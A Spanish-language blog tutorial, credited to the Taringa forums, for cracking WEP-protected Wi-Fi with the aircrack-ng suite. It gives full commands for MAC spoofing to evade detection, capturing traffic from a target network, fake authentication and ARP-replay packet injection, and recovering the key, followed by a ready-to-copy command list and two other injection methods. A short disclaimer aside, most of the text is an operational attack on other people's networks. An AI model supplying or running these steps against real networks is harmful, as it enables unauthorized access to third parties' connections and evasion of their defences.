Auditoria Inalámbrica

Pormiguel

Aunque parezca un tópico, con este texto no pretendo incitar al aprovechamiento de conexiones a internet ajenas sino aprender y encontrar sentido a lo que se hace.

Este tutorial se puede seguir utilizando una distribución preparada para ello como backtrack o bien instalando los paquetes necesarios en cualquier otra distribución.

Abre una ventana de terminal (o consola) y escribe lo siguiente:

airmon-ng


Aqui te va a decir cual es tu tarjeta inalambrica, lo normal es que salga wlan0, o eth0, o eth1, cosas asi por el estilo, tu te vas a dar cuenta de cual es, en mi caso es la wlan0.

Luego introduce los siguientes comandos:
airmon-ng stop wlan0
ifconfig wlan0 down


 Con esto deshabilitas la tarjeta de red inalambrica para hacerle un cambio de mac, este con dos razones importantes:

1. Para que asi no haya problemas de que te puedan detectar e impedirte futuras conexiones y

2. Vas a necesitar el número de mac mas adelante y esta es una fácil de escribir y recordar.

Para cambiar la mac escribe los sigueintes comandos:
macchanger –mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0


 Con el primer comando se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 y con el segundo habilitaste nuevamente tu tarjeta de red inalambrica (puede tardar un poco este ultimo comando)

Ahora vas a proceder a ver las redes inalambricas que estan a tu alcance con el siguiente comando:
airodump-ng wlan0


Va a salir la lista de las redes inalambricas, donde dice el BSSID (mac del router que da la señal), PWR (Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP) y ESSID (Nombre de la red inalambrica).

Para explicar bien esta parte vamos a poner un ejemplo:

BSSID
66:77:88:99:00:11
CHN
6
ESSID
ejemplo

Ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:
airodump-ng -c 6 -w prueba –bssid 66:77:88:99:00:11 wlan0


Donde:
-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto estan en la direccion /root)
–bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalambrica

Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados, para poder descifrar una wep es necesario 20,000 paquetes. Te daras cuenta que puede ir muy lento, esto significa que ninguna persona esta utilizando la red entonces no esta generando trafico y te podria llevar dias llegar a los 20,000 paquetes, pero no te preocupes que ahora te enseñare como generar trafico en la red.
Para inyectarle trafico a la red abre otra terminal (consola) donde introduciras los siguientes comandos:
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0


Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
-e es el nombre de la red que estamos atacando

Luego cuando salgan 4 lineas de codigos y te diga que la conexion esta succesfull, esto significa que estas conectado en capa 2 al router de la red que estamos atacando.
Si por alguna razon no se puede conectar algunas de las razones son las siguientes:
-La red a la que quieres atacar esta muy lejos
-Tu tarjeta de red no puede hacer inyeccion de paquetes
-El router tiene seguridad para evitar este tipo de ataques

-No estais en el mismo canal cosas que se puede solucionar con:

iwconfig wlan0 channel xxx

donde xxx es el número de canal del router al que atacamos.

Ahora para inyectarle el trafico introducce el siguientes comando:
aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0

Donde:
-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
Veras que que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te daras cuenta que la DATA va caminando muy rapido.

Ahora abre otra terminal (consola) e introduce el siguiente comando:
aircrack-ng prueba-01.cap


Donde:
-Prueba-01.cap es el archivo donde se estan capturando los datos
Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:
[XX:XX:XX:XX:XX:XX]
Donde las XX son las letras o numeros de la contraseña, por ejemplo:
Si te muestra [12:34:56:78:90]
La contraseña para esa red inalambrica seria 1234567890.

Bueno para aquellos que quieren probar aqui les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:

# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger –mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
# airodump-ng wlan0
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap

Para aquellos que quieren probar otras formas de inyeccion aqui les dejo otras dos formas que me han funcionado perfecto:

Forma 2:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando

Forma 3:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -5 -b <BSSID> -h <mac> wlan0
ver como se llama el archivo .xor
# packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> -w ARP
# aireplay-ng -2 -r ARP wlan0

Extraido de los foros de Taringa.

Publicaciones Similares

Píldora Kali – Virtualbox

Pormiguel

Siempre que he instalado Kali hasta ahora en una máquina virtual utilizando Virtualbox he tenido problemas con el apartado gráficos en cuanto al redimensionamiento de la pantalla. Pues bien, viendo un tutorial por Youtube un compañero me dío la solución. Una vez instalado Kali, actualizado convenientemente y reiniciado, en consola tecleamos: apt-get install -y virtualbox-guest-x11…

Rclone (3/3): Recuperando datos
| |

Rclone (3/3): Recuperando datos

Pormiguel

Ya tenemos el entorno preparado y los datos salvados en la nube pero necesitamos un mecanismo que nos permita recuperar de forma rápida dichos datos. Propongo dos formas: Montaje de la carpeta de Google Drive encriptada como unidad de nuestro ordenador. Recuperación de los datos a través de un servidor http que nos ofrezca de…

Zerotier te da la vida

Pormiguel

Hace tiempo que no hago ninguna entrada en el blog. Mea culpa. No hay excusa. Pero ahora me animo con un servicio que ha «revolucionado» la gestión de las redes, en particular, las VPN. Para quien no se haya oído hablar de Zerotier diré que es una empresa que nos suministra un servicio centralizado de…

|

Construye tu ordenador hacker portable con Raspberry Pi3

Pormiguel

Ante todo decir que el contenido aquí expuesto no es mas que una traduccíon del tutorial de youtube: PNPtutorials. Se trata de de montar una distribución kali sobre raspberry Pi3 y configurarla de tal manera que nos permita examinar y estudiar las redes wifis de nuestro entorno. Pasamos al tutorial. Necesitaremos: 1 móvil desde el cual…

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *